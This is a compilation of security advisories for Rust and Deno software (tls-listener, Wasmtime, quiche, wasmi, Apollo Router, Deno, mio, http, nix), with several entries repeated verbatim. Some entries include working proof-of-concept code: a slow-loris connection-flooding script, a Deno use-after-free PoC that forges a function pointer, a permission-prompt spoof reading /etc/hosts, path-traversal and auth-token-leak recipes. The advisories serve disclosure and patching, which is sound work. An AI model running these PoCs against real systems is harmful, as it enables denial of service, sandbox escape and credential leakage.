With the default configuration of tls-listener, a malicious user can open 6.4 TcpStream
s a second, sending 0 bytes, and can trigger a DoS.
The default configuration options make any public service using TlsListener::new()
vulnerable to a slow-loris DoS attack.
/// Default number of concurrent handshakes
pub const DEFAULT_MAX_HANDSHAKES: usize = 64;
/// Default timeout for the TLS handshake.
pub const DEFAULT_HANDSHAKE_TIMEOUT: Duration = Duration::from_secs(10);
Running the HTTP TLS server example: https://github.com/tmccombs/tls-listener/blob/6c57dea2d9beb1577ae4d80f6eaf03aad4ef3857/examples/http.rs, then running the following script will prevent new connections to the server.
use std::{net::ToSocketAddrs, time::Duration};
use tokio::{io::AsyncReadExt, net::TcpStream, task::JoinSet};
#[tokio::main]
async fn main() {
const N: usize = 1024;
const T: Duration = Duration::from_secs(10);
let url = "127.0.0.1:3000";
let sockets: Vec<_> = url
.to_socket_addrs()
.unwrap()
.inspect(|s| println!("{s:?}"))
.collect();
let mut js = JoinSet::new();
let mut int = tokio::time::interval(T / (N as u32) / (sockets.len() as u32));
int.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Burst);
for _ in 0..10000 {
for &socket in &sockets {
int.tick().await;
js.spawn(async move {
let mut stream = TcpStream::connect(socket).await.unwrap();
let _ = tokio::time::timeout(T, stream.read_to_end(&mut Vec::new())).await;
});
}
}
while js.join_next().await.is_some() {}
}
This is an instance of a slow-loris attack. This impacts any publically accessible service using the default configuration of tls-listener
Previous versions can mitigate this by passing a large value, such as usize::MAX
as the parameter to Builder::max_handshakes
.
Wasmtime's implementation of the SIMD proposal for WebAssembly on x86_64 contained two distinct bugs in the instruction lowerings implemented in Cranelift. The aarch64 implementation of the simd proposal is not affected. The bugs were presented in the i8x16.swizzle
and select
WebAssembly instructions. The select
instruction is only affected when the inputs are of v128
type. The correspondingly affected Cranelift instructions were swizzle
and select
.
The swizzle
instruction lowering in Cranelift erroneously overwrote the mask input register which could corrupt a constant value, for example. This means that future uses of the same constant may see a different value than the constant itself.
The select
instruction lowering in Cranelift wasn't correctly implemented for vector types that are 128-bits wide. When the condition was 0 the wrong instruction was used to move the correct input to the output of the instruction meaning that only the low 32 bits were moved and the upper 96 bits of the result were left as whatever the register previously contained (instead of the input being moved from). The select
instruction worked correctly if the condition was nonzero, however.
This bug in Wasmtime's implementation of these instructions on x86_64 represents an incorrect implementation of the specified semantics of these instructions according to the WebAssembly specification. The impact of this is benign for hosts running WebAssembly but represents possible vulnerabilities within the execution of a guest program. For example a WebAssembly program could take unintended branches or materialize incorrect values internally which runs the risk of exposing the program itself to other related vulnerabilities which can occur from miscompilations.
We have released Wasmtime 0.38.1 and cranelift-codegen (and other associated cranelift crates) 0.85.1 which contain the corrected implementations of these two instructions in Cranelift.
If upgrading is not an option for you at this time, you can avoid the vulnerability by disabling the Wasm simd proposal
config.wasm_simd(false);
Additionally the bug is only present on x86_64 hosts. Other aarch64 hosts are not affected. Note that s390x hosts don't yet implement the simd proposal and are not affected.
swizzle
instructionselect
instructionIf you have any questions or comments about this advisory:
Wasmtime's implementation of the SIMD proposal for WebAssembly on x86_64 contained two distinct bugs in the instruction lowerings implemented in Cranelift. The aarch64 implementation of the simd proposal is not affected. The bugs were presented in the i8x16.swizzle
and select
WebAssembly instructions. The select
instruction is only affected when the inputs are of v128
type. The correspondingly affected Cranelift instructions were swizzle
and select
.
The swizzle
instruction lowering in Cranelift erroneously overwrote the mask input register which could corrupt a constant value, for example. This means that future uses of the same constant may see a different value than the constant itself.
The select
instruction lowering in Cranelift wasn't correctly implemented for vector types that are 128-bits wide. When the condition was 0 the wrong instruction was used to move the correct input to the output of the instruction meaning that only the low 32 bits were moved and the upper 96 bits of the result were left as whatever the register previously contained (instead of the input being moved from). The select
instruction worked correctly if the condition was nonzero, however.
This bug in Wasmtime's implementation of these instructions on x86_64 represents an incorrect implementation of the specified semantics of these instructions according to the WebAssembly specification. The impact of this is benign for hosts running WebAssembly but represents possible vulnerabilities within the execution of a guest program. For example a WebAssembly program could take unintended branches or materialize incorrect values internally which runs the risk of exposing the program itself to other related vulnerabilities which can occur from miscompilations.
We have released Wasmtime 0.38.1 and cranelift-codegen (and other associated cranelift crates) 0.85.1 which contain the corrected implementations of these two instructions in Cranelift.
If upgrading is not an option for you at this time, you can avoid the vulnerability by disabling the Wasm simd proposal
config.wasm_simd(false);
Additionally the bug is only present on x86_64 hosts. Other aarch64 hosts are not affected. Note that s390x hosts don't yet implement the simd proposal and are not affected.
swizzle
instructionselect
instructionIf you have any questions or comments about this advisory:
Cloudflare Quiche (through version 0.19.1/0.20.0) was affected by an unlimited resource allocation vulnerability causing rapid increase of memory usage of the system running quiche server or client.
A remote attacker could take advantage of this vulnerability by repeatedly sending an unlimited number of 1-RTT CRYPTO frames after previously completing the QUIC handshake. Exploitation was possible for the duration of the connection which could be extended by the attacker.
Quiche 0.19.2 and 0.20.1 are the earliest versions containing the fix for this issue.
Cloudflare Quiche (through version 0.19.1/0.20.0) was affected by an unlimited resource allocation vulnerability causing rapid increase of memory usage of the system running quiche server or client.
A remote attacker could take advantage of this vulnerability by repeatedly sending an unlimited number of 1-RTT CRYPTO frames after previously completing the QUIC handshake. Exploitation was possible for the duration of the connection which could be extended by the attacker.
Quiche 0.19.2 and 0.20.1 are the earliest versions containing the fix for this issue.
Cloudflare quiche was discovered to be vulnerable to unbounded storage of information related to connection ID retirement, which could lead to excessive resource consumption. Each QUIC connection possesses a set of connection Identifiers (IDs); see RFC 9000 Section 5.1. Endpoints declare the number of active connection IDs they are willing to support using the active_connection_id_limit transport parameter. The peer can create new IDs using a NEW_CONNECTION_ID frame but must stay within the active ID limit. This is done by retirement of old IDs, the endpoint sends NEW_CONNECTION_ID includes a value in the retire_prior_to field, which elicits a RETIRE_CONNECTION_ID frame as confirmation. An unauthenticated remote attacker can exploit the vulnerability by sending NEW_CONNECTION_ID frames and manipulating the connection (e.g. by restricting the peer's congestion window size) so that RETIRE_CONNECTION_ID frames can only be sent at a slower rate than they are received, leading to storage of information related to connection IDs in an unbounded queue.
Quiche versions 0.19.2 and 0.20.1 are the earliest to address this problem. There is no workaround for affected versions.
Cloudflare quiche was discovered to be vulnerable to unbounded storage of information related to connection ID retirement, which could lead to excessive resource consumption. Each QUIC connection possesses a set of connection Identifiers (IDs); see RFC 9000 Section 5.1. Endpoints declare the number of active connection IDs they are willing to support using the active_connection_id_limit transport parameter. The peer can create new IDs using a NEW_CONNECTION_ID frame but must stay within the active ID limit. This is done by retirement of old IDs, the endpoint sends NEW_CONNECTION_ID includes a value in the retire_prior_to field, which elicits a RETIRE_CONNECTION_ID frame as confirmation. An unauthenticated remote attacker can exploit the vulnerability by sending NEW_CONNECTION_ID frames and manipulating the connection (e.g. by restricting the peer's congestion window size) so that RETIRE_CONNECTION_ID frames can only be sent at a slower rate than they are received, leading to storage of information related to connection IDs in an unbounded queue.
Quiche versions 0.19.2 and 0.20.1 are the earliest to address this problem. There is no workaround for affected versions.
In the WASMI Interpreter, an Out-of-bounds Buffer Write will arise arise if the host calls or resumes a Wasm function with more parameters than the default limit (128), as it will surpass the stack value. This doesn’t affect calls from Wasm to Wasm, only from host to Wasm.
After conducting an analysis of the dependent Polkadot systems of wasmi
: Pallet Contracts, Parity Signer, and Smoldot, we have found that none on those systems have been affected by the issue as they are calling host to Wasm function with a small limited amount of parameters always.
If you are using wasmi
betwen version 0.15.0 and 0.31.0, please update it to the 0.31.1 patch release that we just published.
Ensure no more than 128 parameters can be pass in a call from the host to a Wasm function.
Patch PR:
Special thanks to Stellar Development Foundation for reporting this security vulnerability.
The Apollo Router is a configurable, high-performance graph router written in Rust to run a federated supergraph that uses Apollo Federation. Affected versions are subject to a Denial-of-Service (DoS) type vulnerability. When receiving compressed HTTP payloads, affected versions of the Router evaluate the limits.http_max_request_bytes
configuration option after the entirety of the compressed payload is decompressed. If affected versions of the Router receive highly compressed payloads, this could result in significant memory consumption while the compressed payload is expanded.
Router version 1.40.2 has a fix for the vulnerability.
If you are unable to upgrade, you may be able to implement mitigations at proxies or load balancers positioned in front of your Router fleet (e.g. Nginx, HAProxy, or cloud-native WAF services) by creating limits on HTTP body upload size.
Use of inherently unsafe *const c_void
and ExternalPointer
leads to use-after-free access of the underlying structure, resulting in arbitrary code execution.
*const c_void
and ExternalPointer
(defined via external!()
macros) types are used to represent v8::External
wrapping arbitrary void*
with an external lifetime. This is inherently unsafe as we are effectively eliding all Rust lifetime safety guarantees.
*const c_void
is trivially unsafe. ExternalPointer
attempts to resolve this issue by wrapping the underlying pointer with a usize
d marker (ExternalWithMarker<T>
).
However, the marker relies on the randomness of PIE address (binary base address) which is still trivially exploitable for a non-PIE binary. It is also equally exploitable on a PIE binary when an attacker is able to derandomize the PIE address. This is problematic as it escalates an information leak of the PIE address into an exploitable vulnerability.
Note that an attacker able to control code executed inside the Deno runtime is very likely to be able to bypass ASLR with any means necessary (e.g. by chaining another vulnerability, or by using other granted permissions such as --allow-read
to read /proc/self/maps
).
For simplicity, we use Deno version 1.38.0 where streaming operations uses *const c_void
. Testing environment is Docker image denoland/deno:alpine-1.38.0@sha256:fe51a00f4fbbaf1e72b29667c3eeeda429160cef2342f22a92c3820020d41f38
although the exact versions shouldn't matter much if it's in 1.36.2 up to 1.38.0 (before ExternalPointer
patch, refer Impact section for details)
const ops = Deno[Deno.internal].core.ops;
const rid = ops.op_readable_stream_resource_allocate();
const sink = ops.op_readable_stream_resource_get_sink(rid);
// close
ops.op_readable_stream_resource_close(sink);
ops.op_readable_stream_resource_close(sink);
// reclaim BoundedBufferChannelInner
const ab = new ArrayBuffer(0x8058);
const dv = new DataView(ab);
// forge chunk contents
dv.setBigUint64(0, 2n, true);
dv.setBigUint64(0x8030, 0x1337c0d30000n, true);
// trigger segfault
Deno.close(rid);
Below is the dmesg log after the crash. We see that Deno has segfaulted on 1337c0d30008
, which is +8 of what we have written at offset 0x8030. Note also that the dereferenced value will immediately be used as a function pointer, with the first argument dereferenced from offset 0x8038 - it is trivial to use this to build an end-to-end exploit.
[ 6439.821046] deno[15088]: segfault at 1337c0d30008 ip 0000557b53e2fb3e sp 00007fffd485ac70 error 4 in deno[557b51714000+2d7f000] likely on CPU 12 (core 12, socket 0)
[ 6439.821054] Code: 00 00 00 00 48 85 c0 74 03 ff 50 08 49 8b 86 30 80 00 00 49 8b be 38 80 00 00 49 c7 86 30 80 00 00 00 00 00 00 48 85 c0 74 03 <ff> 50 08 48 ff 03 48 83 c4 08 5b 41 5e c3 48 8d 3d 0d 1a 59 fb 48
The same vulnerability exists for ExternalPointer
implementation, but now it is required for the attacker to either leak the PIE address somehow, or else exploit unexpected aliasing behavior of v8::External
values. The latter has not been investigated in depth, but it is theoretically possible to alias the same underlying pointer to different v8::External
on different threads (Workers) and exploit the concurrency (RefCell
may break this though).
Use of inherently unsafe *const c_void
and ExternalPointer
leads to use-after-free access of the underlying structure, which is exploitable by an attacker controlling the code executed inside a Deno runtime to obtain arbitrary code execution on the host machine regardless of permissions.
This bug is known to be exploitable for both *const c_void
and ExternalPointer
implementations.
Affected versions of Deno is from 1.36.2 up to latest.
*const c_void
introduced in 1.36.2ExternalPointer
in 1.38.1ExternalPointer
introduced in 1.38.2Use of raw file descriptors in op_node_ipc_pipe()
leads to premature close of arbitrary file descriptors, allowing standard input to be re-opened as a different resource resulting in permission prompt bypass.
Node child_process IPC relies on the JS side to pass the raw IPC file descriptor to op_node_ipc_pipe()
, which returns a IpcJsonStreamResource
ID associated with the file descriptor. On closing the resource, the raw file descriptor is closed together.
Although closing a file descriptor is seemingly a harmless task, this has been known to be exploitable:
--allow-read
and --allow-write
permissions, one can open /dev/ptmx
as stdin. This device happily accepts TTY ioctls and pipes anything written into it back to the reader. setuid()
was used to drop permissions and deny access to /proc
since global write permissions are usually equivalent to arbitrary code execution (/proc/self/mem
).As this vulnerability conveniently allows us to close stdin (fd 0) without any FFI, we can open any resource that when read returns y
, Y
or A
as its first character (runtimes/permissions/prompter.rs) to bypass the prompt.
There is a caveat however - all stdio/stdin/stderr streams are locked, after which clear_stdin()
is called. This invokes libc::tcflush(0, libc::TCIFLUSH)
which fails on a non-TTY file descriptor.
This can be exploited by widening the race window between clear_stdin()
and the next stdin_lock.read_line()
. Notably, the prompt message contains the requested resource name (path) which is filtered by strip_ansi_codes_and_ascii_control()
. This is also concatenated by write!()
to make a single buffer printed out to stderr. Thus, if we request a very long resource name, the window will widen allowing us to easily and stably race another Worker that closes fd 0 and opens a resource starting with an A\n
within the race window.
Note that attacker does not need any permissions to exploit this bug to a full permission prompt bypass, as Cache API can be used to create and open files with controlled content without any permissions. Refer to the Impact section for more details.
Testing environment is Docker image denoland/deno:alpine-1.39.0@sha256:95064390f2c115673762bfc4fe15b1a7f81c859038b8c02b277ede7cd8a2ccbf
.
Below PoC closes stdout (fd 1) and then prints two lines, one on stdout and one on stderr. Only the latter line is shown as stdout file descriptor is closed.
const ops = Deno[Deno.internal].core.ops;
// open fd 1 as ipc stream resource
const rid = ops.op_node_ipc_pipe(1);
// close resource & fd 1
Deno.close(rid);
// this should not be seen (stdout)
console.log('not seen');
// but this is seen (stderr)
console.error('seen');
Below is /proc/$(pgrep deno)/fd
right after executing the last line of the above PoC. We see that fd 1 is indeed missing.
total 0
dr-x------ 2 root root 30 Dec 18 07:07 ./
dr-xr-xr-x 9 root root 0 Dec 18 07:07 ../
lrwx------ 1 root root 64 Dec 18 07:07 0 -> /dev/pts/0
l-wx------ 1 root root 64 Dec 18 07:07 10 -> 'pipe:[159305]'
lr-x------ 1 root root 64 Dec 18 07:07 11 -> 'pipe:[159306]'
l-wx------ 1 root root 64 Dec 18 07:07 12 -> 'pipe:[159306]'
lrwx------ 1 root root 64 Dec 18 07:07 13 -> /deno-dir/dep_analysis_cache_v1
l-wx------ 1 root root 64 Dec 18 07:07 14 -> 'pipe:[159305]'
l-wx------ 1 root root 64 Dec 18 07:07 15 -> 'pipe:[159306]'
lrwx------ 1 root root 64 Dec 18 07:07 16 -> /deno-dir/node_analysis_cache_v1
lrwx------ 1 root root 64 Dec 18 07:07 17 -> /dev/pts/0
lrwx------ 1 root root 64 Dec 18 07:07 18 -> /dev/pts/0
lrwx------ 1 root root 64 Dec 18 07:07 19 -> /dev/pts/0
lrwx------ 1 root root 64 Dec 18 07:07 2 -> /dev/pts/0
lrwx------ 1 root root 64 Dec 18 07:07 20 -> 'anon_inode:[eventpoll]'
lrwx------ 1 root root 64 Dec 18 07:07 21 -> 'anon_inode:[eventfd]'
lrwx------ 1 root root 64 Dec 18 07:07 22 -> 'anon_inode:[eventpoll]'
lrwx------ 1 root root 64 Dec 18 07:07 23 -> 'socket:[159302]'
lrwx------ 1 root root 64 Dec 18 07:07 24 -> 'anon_inode:[eventpoll]'
lrwx------ 1 root root 64 Dec 18 07:07 25 -> 'anon_inode:[eventfd]'
lrwx------ 1 root root 64 Dec 18 07:07 26 -> 'anon_inode:[eventpoll]'
lrwx------ 1 root root 64 Dec 18 07:07 27 -> 'socket:[159302]'
lrwx------ 1 root root 64 Dec 18 07:07 28 -> 'socket:[159310]'
lrwx------ 1 root root 64 Dec 18 07:07 29 -> 'socket:[159308]'
lrwx------ 1 root root 64 Dec 18 07:07 3 -> 'anon_inode:[eventpoll]'
lrwx------ 1 root root 64 Dec 18 07:07 30 -> 'socket:[159309]'
lrwx------ 1 root root 64 Dec 18 07:07 4 -> 'anon_inode:[eventfd]'
lrwx------ 1 root root 64 Dec 18 07:07 5 -> 'anon_inode:[eventpoll]'
lrwx------ 1 root root 64 Dec 18 07:07 6 -> 'socket:[159302]'
lrwx------ 1 root root 64 Dec 18 07:07 7 -> 'socket:[159303]'
lrwx------ 1 root root 64 Dec 18 07:07 8 -> 'socket:[159302]'
lr-x------ 1 root root 64 Dec 18 07:07 9 -> 'pipe:[159305]'
Use of raw file descriptors in op_node_ipc_pipe()
leads to premature close of arbitrary file descriptors. This allow standard input (fd 0) to be closed and re-opened for a different resource, which allows a silent permission prompt bypass. This is exploitable by an attacker controlling the code executed inside a Deno runtime to obtain arbitrary code execution on the host machine regardless of permissions.
This bug is known to be exploitable - there is a working exploit that achieves arbitrary code execution by bypassing prompts from zero permissions, additionally abusing the fact that Cache API lacks filesystem permission checks. The attack can be conducted silently as stderr can also be closed, suppressing all prompt outputs.
Note that Deno's security model is currently described as follows:
- All runtime I/O is considered to be privileged and must always be guarded by a runtime permission. This includes filesystem access, network access, etc.
- The only exception to this is runtime storage explosion attacks that are isolated to a part of the file system, caused by evaluated code (for example, caching big dependencies or no limits on runtime caches such as the Web Cache API).
Although it is ambiguous if the fundamental lack of file system permission checks on Web Cache API is a vulnerability or not, the reporter have not reported this as a vulnerability assuming that this is a known risk (or a feature).
Affected version of Deno is 1.39.0.
Deno improperly checks that an import specifier's hostname is equal to or a child of a token's hostname, which can cause tokens to be sent to servers they shouldn't be sent to. An auth token intended for example.com
may be sent to notexample.com
.
auth_tokens.rs uses a simple ends_with check, which matches www.deno.land
to a deno.land
token as intended, but also matches im-in-ur-servers-attacking-ur-deno.land
to deno.land
tokens.
denovulnpoc.example.com
.DENO_AUTH_TOKENS=a1b2c3d4e5f6@left-truncated.domain deno run https://not-a-left-truncated.domain
. For example, DENO_AUTH_TOKENS=a1b2c3d4e5f6@poc.example.com deno run https://denovulnpoc.example.com
What kind of vulnerability is it? Who is impacted? Anyone who uses DENO_AUTH_TOKENS and imports potentially untrusted code is affected.
This advisory has been withdrawn because it is a duplicate of GHSA-3qx3-6hxr-j2ch. This link is maintained to preserve external references.
Buffer Overflow vulnerability in eza before version 0.18.2, allows local attackers to execute arbitrary code via the .git/HEAD, .git/refs, and .git/objects components.
A maliciously crafted permission request can show the spoofed permission prompt by inserting a broken ANSI escape sequence into the request contents.
In the patch for CVE-2023-28446, Deno is stripping any ANSI escape sequences from the permission prompt, but permissions given to the program are based on the contents that contain the ANSI escape sequences.
For example, requesting the read permission with /tmp/hello\u001b[/../../etc/hosts
as a path will display the /tmp/hellotc/hosts
in the permission prompt, but the actual permission given to the program is /tmp/hello\u001b[/../../etc/hosts
, which is /etc/hosts
after the normalization.
This difference allows a malicious Deno program to spoof the contents of the permission prompt.
Run the following JavaScript and observe that /tmp/hellotc/hosts
is displayed in the permission prompt instead of /etc/hosts
, although Deno gives access to /etc/hosts
.
const permission = { name: "read", path: "/tmp/hello\u001b[/../../etc/hosts" };
await Deno.permissions.request(permission);
console.log(await Deno.readTextFile("/etc/hosts"));
┌ ⚠️ Deno requests read access to "/etc/hosts".
├ Requested by `Deno.permissions.query()` API
├ Run again with --allow-read to bypass this prompt.
└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all read permissions) >
┌ ⚠️ Deno requests read access to "/tmp/hellotc/hosts".
├ Requested by `Deno.permissions.query()` API
├ Run again with --allow-read to bypass this prompt.
└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all read permissions) >
Any Deno program can spoof the content of the interactive permission prompt by inserting a broken ANSI code, which allows a malicious Deno program to display the wrong file path or program name to the user.
A vulnerability in Deno's Node.js compatibility runtime allows for cross-session data contamination during simultaneous asynchronous reads from Node.js streams sourced from sockets or files. The issue arises from the re-use of a global buffer (BUF) in stream_wrap.ts used as a performance optimization to limit allocations during these asynchronous read operations. This can lead to data intended for one session being received by another session, potentially resulting in data corruption and unexpected behavior.
A bug in Deno's Node.js compatibility runtime results in data cross-reception during simultaneous asynchronous reads from Node.js network streams. When multiple independent network socket connections are involved, this vulnerability can be triggered. For instance, two separate server sockets that receive data from their respective client sockets and then echo the received data back to the client using Node.js streams may experience an issue where data from one socket may appear on another socket. Due to the improper isolation of the global buffer (BUF
), data sent by one socket can end up being incorrectly received by another socket. Consequently, data intended for one session may be exposed to another session, potentially leading to data corruption and unexpected behavior.
This buffer was introduced as a performance optimization to avoid excessive allocations during network read operations.
In cases where the net.Stream is connected to a remote server such as a database or key/value store such as Redis, this may result in a packet received on one connection being presented to another, causing data cross-contamination between multiple users and potentially leaking sensitive information.
It is important to note that this vulnerability does not affect Deno network streams created with the Deno.listen
and Deno.connect
APIs.
The impact of this issue may extend beyond node.js network streams, however, and may also affect asynchronous reads from non-network node.js Stream such as those created from files.
https://github.com/denoland/deno/issues/20188
This affects all users of Deno that use the node.js compatibility layer for network communication or other streams, including packages that may require node.js libraries indirectly.
Insufficient validation of parameters in Deno.makeTemp*
APIs would allow for creation of files outside of the allowed directories. This may allow the user to overwrite important files on the system that may affect other systems.
A user may provide a prefix or suffix to a Deno.makeTemp*
API containing path traversal characters. The permission check would prompt for the base directory of the API, but the final file that was created would be outside of this directory:
$ mkdir /tmp/good
$ mkdir /tmp/bad
$ deno repl --allow-write=/tmp/good
> Deno.makeTempFileSync({ dir: "/tmp/bad" })
┌ ⚠️ Deno requests write access to "/tmp/bad".
├ Requested by `Deno.makeTempFile()` API.
├ Run again with --allow-write to bypass this prompt.
└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all write permissions) > n
❌ Denied write access to "/tmp/bad".
Uncaught PermissionDenied: Requires write access to "/tmp/bad", run again with the --allow-write flag
at Object.makeTempFileSync (ext:deno_fs/30_fs.js:176:10)
at <anonymous>:1:27
> Deno.makeTempFileSync({ dir: "/tmp/good", prefix: "../bad/" })
"/tmp/good/../bad/a9432ef5"
$ ls -l /tmp/bad/a9432ef5
-rw-------@ 1 user group 0 Mar 4 09:20 /tmp/bad/a9432ef5
This is fixed in Deno 1.41.1.
When using named pipes on Windows, mio will under some circumstances return invalid tokens that correspond to named pipes that have already been deregistered from the mio registry. The impact of this vulnerability depends on how mio is used. For some applications, invalid tokens may be ignored or cause a warning or a crash. On the other hand, for applications that store pointers in the tokens, this vulnerability may result in a use-after-free.
For users of Tokio, this vulnerability is serious and can result in a use-after-free in Tokio.
The vulnerability is Windows-specific, and can only happen if you are using named pipes. Other IO resources are not affected.
This vulnerability has been fixed in mio v0.8.11.
All versions of mio between v0.7.2 and v0.8.10 are vulnerable.
Tokio is vulnerable when you are using a vulnerable version of mio AND you are using at least Tokio v1.30.0. Versions of Tokio prior to v1.30.0 will ignore invalid tokens, so they are not vulnerable.
Vulnerable libraries that use mio can work around this issue by detecting and ignoring invalid tokens.
When an IO resource registered with mio has a readiness event, mio delivers that readiness event to the user using a user-specified token. Mio guarantees that when an IO resource is deregistered, then it will never return the token for that IO resource again. However, for named pipes on windows, mio may sometimes deliver the token for a named pipe even though the named pipe has been previously deregistered.
This vulnerability was originally reported in the Tokio issue tracker: tokio-rs/tokio#6369 This vulnerability was fixed in: tokio-rs/mio#1760 This vulnerability is also known as RUSTSEC-2024-0019.
Thank you to @rofoun and @radekvit for discovering and reporting this issue.
This advisory has been withdrawn because it is a duplicate of GHSA-x7vr-c387-8w57. This link is maintained to preserve external references.
HeaderMap::reserve() used usize::next_power_of_two() to calculate the increased capacity. However, next_power_of_two() silently overflows to 0 if given a sufficiently large number in release mode.
If the map was not empty when the overflow happens, the library will invoke self.grow(0) and start infinite probing. This allows an attacker who controls the argument to reserve() to cause a potential denial of service (DoS).
The flaw was corrected in 0.1.20 release of http crate.
The libc getgrouplist function takes an in/out parameter ngroups specifying the size of the group buffer. When the buffer is too small to hold all of the requested user's group memberships, some libc implementations, including glibc and Solaris libc, will modify ngroups to indicate the actual number of groups for the user, in addition to returning an error. The version of nix::unistd::getgrouplist in nix 0.16.0 and up will resize the buffer to twice its size, but will not read or modify the ngroups variable. Thus, if the user has more than twice as many groups as the initial buffer size of 8, the next call to getgrouplist will then write past the end of the buffer.
The issue would require editing /etc/groups to exploit, which is usually only editable by the root user.
The libc getgrouplist function takes an in/out parameter ngroups specifying the size of the group buffer. When the buffer is too small to hold all of the requested user's group memberships, some libc implementations, including glibc and Solaris libc, will modify ngroups to indicate the actual number of groups for the user, in addition to returning an error. The version of nix::unistd::getgrouplist in nix 0.16.0 and up will resize the buffer to twice its size, but will not read or modify the ngroups variable. Thus, if the user has more than twice as many groups as the initial buffer size of 8, the next call to getgrouplist will then write past the end of the buffer.
The issue would require editing /etc/groups to exploit, which is usually only editable by the root user.